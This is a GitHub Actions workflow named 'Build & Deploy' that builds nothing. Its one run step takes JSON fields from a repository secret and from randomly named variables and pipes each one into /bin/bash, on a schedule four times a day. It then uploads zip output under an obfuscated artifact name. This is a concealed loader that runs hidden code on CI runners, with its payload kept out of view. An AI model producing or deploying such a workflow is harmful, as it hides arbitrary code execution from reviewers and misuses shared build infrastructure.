name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '37 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          oand18: ${{ secrets.oand18 }}
        run: |
          printf '%s' "$oand18" | jq -r .jzd57 | /bin/bash
          echo $xvec698 | jq -r .e32 | /bin/bash
          printf '%s' "$ifxs7" | jq -r .gs40125 | /bin/bash
          echo $vt2615 | jq -r .cm104 | /bin/bash
          echo $do40536 | jq -r .ydqve929 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: CtReJE7o
          path: "*.zip"
          retention-days: 1
